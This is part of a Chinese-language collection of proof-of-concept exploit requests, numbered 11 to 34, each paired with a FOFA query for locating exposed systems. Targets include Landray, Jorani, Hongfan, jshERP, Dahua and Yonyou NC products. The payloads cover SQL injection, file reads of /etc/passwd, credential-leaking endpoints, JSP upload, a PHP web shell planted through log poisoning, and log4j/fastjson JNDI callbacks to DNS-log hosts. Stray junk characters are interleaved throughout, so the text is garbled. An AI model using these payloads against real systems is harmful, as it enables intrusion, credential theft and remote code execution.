2 k  J& e% J( Y: u6 e
- E+ A/ [' b# }( A11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 O% \( |6 J- E& U% lFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
* }6 n" W) S9 U# L7 s' X# {GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
* X, x, e. F/ `Host: 127.0.0.1
0 b; F4 L; q$ I. A1 ]/ R3 ?Pragma: no-cache
5 x- \+ ^' }  S* YCache-Control: no-cache
5 D' Z, I  S) {: i& u3 U0 ~7 T3 qUpgrade-Insecure-Requests: 1% Z8 e8 y. O* H3 B2 ?( Q. Y$ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. P* e; b0 W$ \/ M5 J  n% t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 ~3 Y+ S- G4 lAccept-Encoding: gzip, deflate3 W3 L+ y: g. m) i$ N$ A
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: w2 J. p& G  f$ _4 L2 {* ?
Connection: close
2 ]) a" k0 {" R/ v- B- j0 D3 n' n9 E1 Z5 t: f) n: ~
# ~( o& @' y1 u( h
12. Jorani < 1.0.2 远程命令执行) N( L; t5 E, T7 }3 Y2 k- L& y: O
FOFA:title="Jorani"7 A$ D: {6 c& X
第一步先拿到cookie
3 s2 y2 W7 h. |3 e; tGET /session/login HTTP/1.1
7 f/ V& \! D& _; HHost: 192.168.190.30
  c4 v) Q: G1 nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; S0 M1 ~+ H5 P* |1 n
Connection: close
, o# v& l7 ^8 j( w8 w$ WAccept-Encoding: gzip
0 p6 m! |' M/ L( q2 j% @( J1 \  F

& m7 x3 R% x  q+ y9 Z( c% t响应中csrf_cookie_jorani用于后续请求- `. `' i( p: q& J7 a
HTTP/1.1 200 OK
! ?9 _5 @; Z7 h" JConnection: close
! w* z# u; j2 U9 Y* s9 g6 eCache-Control: no-store, no-cache, must-revalidate) I3 v9 u7 G) o+ A5 o$ w8 h
Content-Type: text/html; charset=UTF-8
) z7 Z( F& B" C9 u$ D8 g8 N1 zDate: Tue, 24 Oct 2023 09:34:28 GMT
# x$ t" y* R$ C7 q. W7 @- S9 RExpires: Thu, 19 Nov 1981 08:52:00 GMT! ^) }5 {! q3 Z# n( W/ W$ R
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT9 Z9 g" e* _0 J! q+ d! V& I8 @
Pragma: no-cache% \3 Z% ^! J& M2 e$ s
Server: Apache/2.4.54 (Debian)
% @! L. q- W  ~* NSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/# I8 M( |/ ~- o/ j' r0 Y. g
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
7 g! I0 `7 g# U3 `3 i" UVary: Accept-Encoding
1 h; l: Q! |4 |: x, w* r6 R5 |2 m5 w

& U! q% `) u; G6 lPOST请求,执行函数并进行base64编码
9 ]3 ~3 L, V7 V8 _6 W5 [POST /session/login HTTP/1.1
- s  X6 P$ d7 H6 d0 ]( s1 oHost: 192.168.190.307 C/ b% J$ A: r+ b% M3 Q' `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 [! ?: i7 N% q, h3 [$ _+ k' z
Connection: close) U$ ^5 k- E7 _( _2 ], J5 z
Content-Length: 252# h4 v5 x, d2 ]+ Y0 x. O
Content-Type: application/x-www-form-urlencoded
! F  T0 v0 |5 T. X+ z: L- oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, V4 |/ A2 i& g% L$ x1 v6 X( ~
Accept-Encoding: gzip
& o# w5 ]! T* V* I* p: c$ ~! D7 m5 F
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
2 X, i6 q* e: R! Q) U  _
! n3 _0 c1 A7 e% E# u/ [3 x
) E) u% a/ L' ^3 [% ?
, Q: a% ^4 d& X  M1 Z/ y* `3 U向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
% i* n' ^" ^& QGET /pages/view/log-2023-10-24 HTTP/1.1
5 u2 j: f- m$ o( T4 B& ~; @" lHost: 192.168.190.30
! R+ w* O; i, ~: ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 F/ F4 U/ _2 e5 J" UConnection: close8 j, ?+ i" Q# n- U5 P" \  p
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r) D8 P  y! @" a+ u' G  P
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
6 a. X" ^8 x+ P, [! |X-REQUESTED-WITH: XMLHttpRequest8 J& A% D8 n! S) l# m1 f
Accept-Encoding: gzip! V. ~" M+ Z# }
+ L, }% e% b9 c4 Q5 |! D5 x
. }; p. M7 F4 [4 p. L
13. 红帆iOffice ioFileDown任意文件读取* }/ b2 V+ }0 Z, P
FOFA:app="红帆-ioffice") U  Q- \, Y3 S" T
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1. V5 j. V3 X, q. s" Y
Host: x.x.x.x3 W1 ^6 L. e2 }% U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ z; G5 f! e, XConnection: close
, K6 A# \5 t" a+ GAccept: */*4 Q+ X2 L4 P% R0 q
Accept-Encoding: gzip
6 w: E3 [+ s& c. I
# I- X. p, w8 Z8 S0 s% E/ R" v
14. 华夏ERP(jshERP)敏感信息泄露
  O% `' o" k6 x  T  Z# FFOFA:body="jshERP-boot"
3 E! b6 x; u( s泄露内容包括用户名密码
6 d% n, d3 H6 G% J2 K: M6 [, iGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
3 z, O+ M; i4 a9 EHost: x.x.x.x
7 z- x$ g$ [0 b  k. BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.369 M1 f* X' V; b  B1 h) q
Connection: close" I. A* J9 G& V3 X6 d1 m
Accept: */*4 R  v% y( l& y4 B' v+ A
Accept-Language: en
  |  e1 L( ^; ?" ~; G. xAccept-Encoding: gzip' |  k' s. `. C6 U) Q

; L( k9 ~' E* F  `0 b2 w8 a8 X2 L
15. 华夏ERP getAllList信息泄露
. S0 R& y* ^9 Y! k4 fCVE-2024-0490, z# H! M: h2 b& J" n% p
FOFA:body="jshERP-boot"$ Q+ A) S3 n$ ?1 i5 k2 O! E
泄露内容包括用户名密码( \$ w4 j" _, e7 l/ c' m
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
8 l) H* c( B! w, v  BHost: 192.168.40.130:100
: K: M" d! v  v  iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" ~7 B/ _5 e4 M
Connection: close$ o$ Q" q4 C6 _! }6 X
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& O/ J5 R' U% R( @+ x
Accept-Language: en
& F4 |5 U6 A! |# I2 Ssec-ch-ua-platform: Windows9 e; ?/ [+ O9 _3 O6 y0 }
Accept-Encoding: gzip0 I, @  R; F5 c3 ?3 l7 O

0 y$ R, ~0 o( \, G* V6 h4 H4 S
+ t& K% K/ e1 U6 n/ L! N/ h16.  红帆HFOffice医微云SQL注入! ?; L9 v7 D0 s# R) A
FOFA:title="HFOffice"( ]4 O4 Y( w! V1 D
poc中调用函数计算1234的md5值
1 ^* G4 t& u, V- _9 DGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.15 ?( J& ?& }  \! z# f5 P
Host: x.x.x.x% c0 R* {7 Q( r( e
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36  t- j4 G4 f* A. g! ]7 E
Connection: close
, Y9 a$ S& \6 n; yAccept: */*3 P: F6 f: {3 ~) e
Accept-Language: en9 S$ J6 e8 P. K5 m. F/ f# d! Q
Accept-Encoding: gzip/ T' _- n8 ~: h4 ^1 [( {6 X

7 q: {5 @. _6 y' I; ?+ A0 Q7 ^3 A1 a' [
17. 大华 DSS itcBulletin SQL 注入
- {6 W0 |: _4 ^0 o, K( |- S+ v; NFOFA:app="dahua-DSS"
( }2 o+ v2 y0 c% |0 APOST /portal/services/itcBulletin?wsdl HTTP/1.1* \1 H& R7 S+ i) W2 |, m
Host: x.x.x.x' _9 N$ ?0 F5 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- e1 T3 M4 j7 H7 r  N% p9 M7 d
Connection: close% c; V1 r' K0 y, F; V
Content-Length: 345
/ A1 c0 O! F) DAccept-Encoding: gzip
: z: d  s/ u; D) ]$ I- A8 z. }. Q! x& y: {! i  e- m
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
( m" ?; ]) R- c2 P<s11:Body>
7 N4 \: h: p; L/ ~, t1 N    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
9 v5 s7 L! u; v5 y! s. s$ ~0 r* T      <netMarkings>
- T# F# p7 E1 z; [, e$ c       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1, g; \& N/ F. t
      </netMarkings>
. g# k! y/ n" [. f& S+ d; w    </ns1:deleteBulletin>" P8 V  ]5 h% j9 R7 K! l
  </s11:Body>) G* p/ l6 f5 y' X# K
</s11:Envelope>9 c* s. X1 N) _/ U; c; c
, u; s# G: C% W/ [; V
, E3 P4 F9 w0 P( e; S6 M. ?
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, s$ @' F1 q' p# o; R8 AFOFA:app="dahua-DSS"
# Q4 Y- [1 U. [$ p1 ^1 j5 c$ BGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
  a- X7 W% F$ ^* {! THost: your-ip" A/ g0 w  j9 B; P( V; v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 i6 U% |$ ~2 r$ K. ^$ E: MAccept-Encoding: gzip, deflate3 x8 `) V: a, ?3 A/ j
Accept: */*( [. A! g2 C% D7 w1 L, n( n2 e
Connection: keep-alive
2 J( s% c2 @! D6 ^- T; G* r
5 R  n: L( m2 Q. t: _( \. L- g' `  H# O( Z7 a% W& D9 r

8 Y7 @+ @0 t+ O8 |2 P0 {19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
8 w* P# z  |" P3 H9 vFOFA:app="dahua-DSS"* W1 K7 M9 l, m' F7 P6 R" {; R8 m
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
9 k. D7 j7 c  I4 c& }Host:& z+ {+ K) W* \6 ^. E
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" n4 g$ E* Y3 _  L9 IAccept-Encoding: gzip, deflate- B0 o( x; U) k' o9 @9 x- _% ~8 W
Accept: */*
4 f1 O; e& L8 \! aConnection: keep-alive
% ]# u* }2 Z4 P1 z+ m: {& J+ @
: j' j- d5 w) O* j+ ^  B- v! M) Y5 f5 R* A9 A# p- J
20. 大华ICC智能物联综合管理平台任意文件读取
5 G# }4 n& w& R% i- P" e/ P% a, qFOFA:body="*客户端会小于800*"' r6 Q9 O: v3 m
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* @/ X# y" p# p, [: N1 ]
Host: x.x.x.x
& s  g2 I, D3 D, A2 bUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ J6 B8 o/ M/ k! SConnection: close9 H  X4 W/ W" w) P- F9 I9 x
Accept: */*
/ ~2 i$ U' `; P. q0 MAccept-Language: en) y$ B" I% w5 r8 }5 n0 K
Accept-Encoding: gzip( v" R. ^7 d  X7 _: O

$ G* L: Z) _+ U3 s
, U7 E0 k- ~- r) {1 N; N21. 大华ICC智能物联综合管理平台random远程代码执行
! ~+ n$ C+ N' e- H+ c$ xFOFA:icon_hash="-1935899595"
# i1 @( ^8 j% K- TPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
" B: m& N0 [. g4 EHost: x.x.x.x
. l1 d! v$ S" O+ x; tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- O' T1 _; q8 Y+ @" W
Content-Length: 1618 L* r1 E/ T8 U
Accept-Encoding: gzip4 A2 M( f) S+ Q2 x9 b0 T4 a
Connection: close% v  l8 p3 @% J
Content-Type: application/json;charset=utf-8* r( L+ ^. J0 C* M6 W, Y/ z

9 h1 c7 X# n5 U; b. x+ P3 ]: ?{
/ X: a/ ]. r4 {0 X. D. Y"a":{! m( v: |) v' x7 M' y7 f& b
   "@type":"com.alibaba.fastjson.JSONObject",
; [2 r% i# u) C$ p    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}+ ~7 G# D* ]9 |5 j8 y
  }""
1 m4 o- q( h( f$ D3 t- l}, `) \: q. i, [" G6 B$ D1 \% h
0 G$ r" ?0 x9 G0 S
6 z9 R  G+ e0 Y
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ J* v# e* y1 h9 h8 K& Y7 {FOFA:icon_hash="-1935899595"
, f# Q; X. I" H: H- h; t( y! uPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1% M) k! _' i& E( F: Y( f
Host: your-ip
( x: z5 p' v) d7 J5 Z) G% `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 @: ^: |) y  nContent-Type: application/json;charset=utf-8+ v: O* @6 b% M
  I6 n) n! _6 k2 I, t
{
. j+ B' Z. ^; C) C. ?"loginName":"${jndi:ldap://dnslog}"
1 ]  |+ b3 p  r! k}7 t$ }1 \: N7 y* R
' }* Y, S. s1 N/ `' n: D
- P* i3 A$ L# D; p9 v3 c( j' k. w: c# v
- F' Y9 W' T$ m1 {6 {2 v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 J7 @$ Y. v" z6 V, A  U) V
FOFA:icon_hash="-1935899595"
7 H! j- |/ J1 R) x. o# uPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! L6 P7 b6 K4 j" O! M% `Host: your-ip0 {$ y# [" j9 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* r' g( z! {# b# x0 @* ?Content-Type: application/json;charset=utf-8
! s6 S8 @. }' W9 fAccept-Encoding: gzip5 T" e6 h* z$ N0 p
Connection: close/ k# w, K$ Q4 U5 S
' x5 \3 C8 d% m' t& |* U% x
{
3 n! o# a& G- {7 ?- N/ v    "a":{( P" _7 c& [" v7 ?
        "@type":"com.alibaba.fastjson.JSONObject",! Q. o: N, G  Q( `1 a
       {"@type":"java.net.URL","val":"http://DNSLOG"}' k, Y7 i7 h$ d4 W3 @* L  T( k. }
        }""
7 s4 @8 p) w8 F# `! Y- ~}
* `0 w6 z$ [0 D* k! K: u% [7 G: J- }3 X1 g; m/ |; k
  D; F9 l5 A- Y2 X
24. 用友NC 6.5 accept.jsp任意文件上传/ i! z; o4 v4 N
FOFA:icon_hash="1085941792"+ N5 l$ x( G- c* h: d# C% p
POST /aim/equipmap/accept.jsp HTTP/1.1
" Q0 e& J: E! v4 Z9 J9 CHost: x.x.x.x6 o. ]0 y+ L# U& i4 M2 K
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.361 d9 H" S/ t5 o, [- q( B$ O6 \$ h
Connection: close
) U# F0 Q- O% T6 sContent-Length: 449
3 m# K# k* a5 C: v: y3 v- r# v/ EAccept: */*
2 E8 E" [8 C+ {3 L& N; HAccept-Encoding: gzip. _& Q& p5 {1 ^+ C$ u
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) h, Y  T7 c% I* U8 L* \
8 O! z9 j  J" L3 [) e4 D% O; o
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc( F- u. v3 e( S
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"! ], W$ P6 M/ L6 N4 b
Content-Type: text/plain8 Y. z: e4 y. a+ W  ^& \* Z" |

" H+ h5 T6 l, ~7 E! Q3 y<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
# r  S4 r! q- p6 }& P1 N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 }" T6 q, p3 Y$ l# q1 A
Content-Disposition: form-data; name="fname"* p7 }& r  P0 k9 o$ ]  S
8 r: o) U) F' V: {5 [5 ]3 [9 j
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
7 i: Y+ M; M& R! ?1 T! V5 p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--3 n' L# g, P. S; K3 U

; B# u& w% m: q& z; |; V- j
, e$ @0 P1 h1 r6 H/ V25. 用友NC registerServlet JNDI 远程代码执行
! I: L% }! X7 e7 M/ @. EFOFA:app="用友-UFIDA-NC"
  D* B, V8 U1 y" Y0 D8 CPOST /portal/registerServlet HTTP/1.16 O; D9 G4 R' `0 j$ w  p
Host: your-ip% y3 ]2 J) b9 n/ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0' D! |- y* D$ y' m6 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 B6 u0 i" g1 @" c1 R  sAccept-Encoding: gzip, deflate
1 v7 R$ N+ I6 K- ?9 CAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
. X$ g! c- e/ E; G. R9 CContent-Type: application/x-www-form-urlencoded
, `" b, X# X6 R! b$ S, j6 }
& p2 R$ X$ G( B+ ~, c* L5 Vtype=1&dsname=ldap://dnslog
' }6 `' H8 B# |2 i2 F# ], c
7 l+ C" v% e$ N% a2 g/ a
9 M3 X: T7 ]& m: _2 s
: @" D" z5 G& ]0 Q) M, l$ b! m26. 用友NC linkVoucher SQL注入; E% ~" s% m( G, U8 O
FOFA:app="用友-UFIDA-NC"
/ q0 j  W* p/ n* b) t6 C! gGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.12 u& t8 o6 r0 F: n( ]$ v$ C
Host: your-ip
5 R, Y' }, t. @# \. PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ X  `/ D' Y" @# [# KContent-Type: application/x-www-form-urlencoded
$ B. G3 }' L+ Z. [Accept-Encoding: gzip, deflate
: C+ _  ]; n/ O) ~* L) @$ j+ G9 PAccept: */*
: T* S7 S- |" ?  X8 M2 `. ?$ nConnection: keep-alive
" K8 X" i. ~6 X4 N
7 P0 k# d% r5 g+ f. `2 V! u* Q; V* s+ w) Z* `" r
27. 用友 NC showcontent SQL注入% Y- S5 O& P8 b# R9 J( p$ O* W
FOFA:icon_hash="1085941792"
2 o0 \! |" }9 jGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.16 ~9 M. x, q: z9 s; \# e
Host: your-ip  x( ?6 A: u/ {4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( {' x0 ~$ B1 \1 a6 G/ Y; fAccept-Encoding: identity! p& r- u6 F& N' r2 T
Connection: close( N5 @$ l* K3 N/ u0 V5 G
Content-Type: text/xml; charset=utf-8
0 E  S: H8 h9 T* ~1 m# O# ?
$ m' b( g% e7 B+ X- @
) z  A: O! q' {  U. K  l# }2 b. k28. 用友NC grouptemplet 任意文件上传  O* u1 A; B' D& M* i7 d9 Z( x+ F
FOFA:icon_hash="1085941792"4 S9 W- K$ S2 \( B! {
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
. T/ S# F$ ~3 F7 N2 K) O8 }! i: GHost: x.x.x.x
2 t' i, }1 d7 p8 {( ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.368 H' \6 B/ q( J. L
Connection: close7 M# }' k. J, h6 M" p% y' `3 t2 M+ {% {7 D
Content-Length: 268$ R# r. c* e5 ^8 ]! ]
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) @8 G* V% r/ MAccept-Encoding: gzip$ A' K& I  M0 {# `  l  x+ `
/ q- i4 M- \: C- M( J" i
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' O7 U  h2 y0 A6 FContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp", R3 ], T' e8 c5 q4 A
Content-Type: application/octet-stream
4 j. _, ]* |: w5 H+ ~
; H( T; j/ r. K# F3 K- B5 D<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
6 T3 r$ v, Z& b. X. `------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--3 y4 E/ R1 V/ C: r8 x$ F; p
; y8 @0 U/ e5 N6 p

/ o% d* l6 X  I4 Y3 p! q$ h* n7 d2 @" u/uapim/static/pages/nc/head.jsp$ n+ O# c9 z% \% f' A5 {

, ~1 v9 k/ Z  R& ]5 w29. 用友NC down/bill SQL注入7 ?: ], H: M  G" j
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 j: a( f. z7 T9 V; W6 x" QGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ d! R: g) N+ U* N6 m' d2 T# V6 wHost: your-ip7 c! M! T1 x, n- c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 w" @3 L5 d+ [, F# H- l4 u8 `
Content-Type: application/x-www-form-urlencoded
$ A% X0 c0 X" aAccept-Encoding: gzip, deflate  K0 N' {$ X% k' N  [- ]1 k* p
Accept: */*- l9 j6 X5 K2 o. ^1 I$ x
Connection: keep-alive3 n) y1 S% c7 m; P1 g
! f7 l; ]% q. \$ }
! H7 L6 P+ f) q
30. 用友NC importPml SQL注入3 m0 U2 H: u3 T" Z; B# n. H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; ?% w' M, K! dPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
0 b2 r7 `; u% x% gHost: your-ip
) Z- N# {7 `/ W* nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V* z3 M) T6 J: R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.369 A' K' @" z" j1 O5 B- b" c/ x
Connection: close* \3 @3 A0 n) `2 ^* F3 }: r' }* [
7 L. L3 Y' A9 f& m8 |! I
------WebKitFormBoundaryH970hbttBhoCyj9V
8 [) _- _: W2 Z% ]+ c* WContent-Disposition: form-data; name="Filedata"; filename="1.jpg"" k! G( W  b- V
Content-Type: image/jpeg( k: j/ s( i$ X7 Y  Y3 r2 r5 d  K- m) ~
------WebKitFormBoundaryH970hbttBhoCyj9V--
5 V- o+ f9 ~$ W+ z9 A' E; t2 L) n4 C: N) B
  S2 F9 ]  v% H9 v
31. 用友NC runStateServlet SQL注入
, v: c' a8 M. D; O+ ?* ]version<=6.5
; z% I( L) b! X/ x  d0 R3 r% ]FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& T! [; _/ \& L" k7 qGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ @7 _( v' @' S: f! V' m, m
Host: host
$ r7 Y! J. m7 ]8 Z* O/ ~& T$ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
" _5 L3 g2 B+ SContent-Type: application/x-www-form-urlencoded0 x7 u, F; m6 T  k/ k
) n: ]2 [0 V$ U5 F) r1 e, y+ ?; e' C
2 k4 e4 Y" [4 }3 B
32. 用友NC complainbilldetail SQL注入
. r% j! Z) P( L. L. j1 J6 iversion= NC633、NC65
9 w& k7 g! C. Q: s) p. P: vFOFA:app="用友-UFIDA-NC"
9 C' _5 C7 P- WGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 B4 r0 ~& W% e$ \* J. QHost: your-ip1 I$ b3 |2 ^" _1 p9 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) o* T+ X" L# y) T
Content-Type: application/x-www-form-urlencoded
( Z: f+ d  q- q3 l; TAccept-Encoding: gzip, deflate& w/ }# f. J9 n5 p" ]1 q9 O& D$ F% F4 s
Accept: */*
8 G4 V- ?3 p* E  X  [8 }3 {Connection: keep-alive
3 a7 l) ~7 l5 F( n. _# C. U
1 h+ P1 T. X, Q+ A5 @/ F2 c3 O- a7 {; M
/ P1 T6 J/ Z5 I; d+ ]33. 用友NC downTax/download SQL注入8 ?/ [0 ^  t- U$ [; N# }9 [) z- b$ n8 s
version:NC6.5FOFA:app="用友-UFIDA-NC"3 l0 S8 \* }2 k- r6 `$ {
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1) v* W! {% l/ ]+ d6 e5 o, `1 K
Host: your-ip
6 L7 {; X- \! h% K6 \' |* sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. C% v9 h3 \, [' L( F. ?& G
Content-Type: application/x-www-form-urlencoded  `9 g& c7 X+ s& i: @2 P* y+ d
Accept-Encoding: gzip, deflate
# e: {5 d  |. kAccept: */*  Z( a7 D5 R" M1 x
Connection: keep-alive
: h6 m& N; o- t+ H3 x8 [$ y$ y0 R, Y) E* y* H3 q4 g
3 I: H, B8 x1 Q( ?. v4 j# ~
34. 用友NC warningDetailInfo接口SQL注入+ {% u6 l. O- a
FOFA:app="用友-UFIDA-NC"
; V  ?! N$ D' l5 t7 J/ N0 w) CGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* \2 {6 p' p# U& ]* W( h+ k- _8 {; |6 K
Host: your-ip# S5 S4 t* |7 q6 J+ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- U0 g! ^+ Y( l
Content-Type: application/x-www-form-urlencoded
8 \& _2 h% \) p/ `Accept-Encoding: gzip, deflate
, N, P5 t* _# l0 c& ]  BAccept: */*8 n9 |8 Y7 f/ @6 g; }
